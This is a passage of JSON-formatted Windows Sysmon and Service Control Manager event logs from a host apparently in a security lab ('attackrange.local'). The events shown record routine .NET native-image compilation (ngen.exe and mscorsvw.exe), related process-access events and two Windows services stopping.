C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:07.539","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F7-5F25-0000-0010F4990A00}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6721,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:07.539\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F7-5F25-0000-0010F4990A00}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:07.539","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F7-5F25-0000-0010F4990A00}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6722,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:07.554\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F7-5F25-0000-0010F4990A00}\r\nTargetProcessId: 3008\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:07.554","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F7-5F25-0000-0010F4990A00}","TargetProcessId":"3008","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6723,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:07.711\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21F7-5F25-0000-0010989D0A00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:07.711","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21F7-5F25-0000-0010989D0A00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6724,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:07.711\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21F7-5F25-0000-0010989D0A00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:07.711","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-21F7-5F25-0000-0010989D0A00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:04:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6725,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:07.711\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21F7-5F25-0000-0010989D0A00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:07.711","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-21F7-5F25-0000-0010989D0A00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:09","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:08","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76875,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Windows Insider Service service entered the stopped state.","param1":"Windows Insider Service","param2":"stopped","EventReceivedTime":"2020-08-01 08:04:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:09","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76876,"ProcessID":856,"ThreadID":2808,"Channel":"System","Message":"The Update Orchestrator Service for Windows Update service entered the stopped state.","param1":"Update Orchestrator Service for Windows Update","param2":"stopped","EventReceivedTime":"2020-08-01 08:04:10","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6726,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:04:10.632\r\nProcessGuid: {41C8662E-21F7-5F25-0000-0010989D0A00}\r\nProcessId: 3816\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ee8-0\\WindowsBase.dll\r\nCreationUtcTime: 2020-08-01 08:04:10.632","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:04:10.632","ProcessGuid":"{41C8662E-21F7-5F25-0000-0010989D0A00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ee8-0\\WindowsBase.dll","CreationUtcTime":"2020-08-01 08:04:10.632","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6727,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:10.726\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-21FA-5F25-0000-00104BA30A00}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:04:10.726","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-21FA-5F25-0000-00104BA30A00}","TargetProcessId":"4456","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:04:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:04:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6728,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:04:10.726\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-21FA-5F25-0000-00104BA30A00}\r\nTargetProcessId: 4456\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 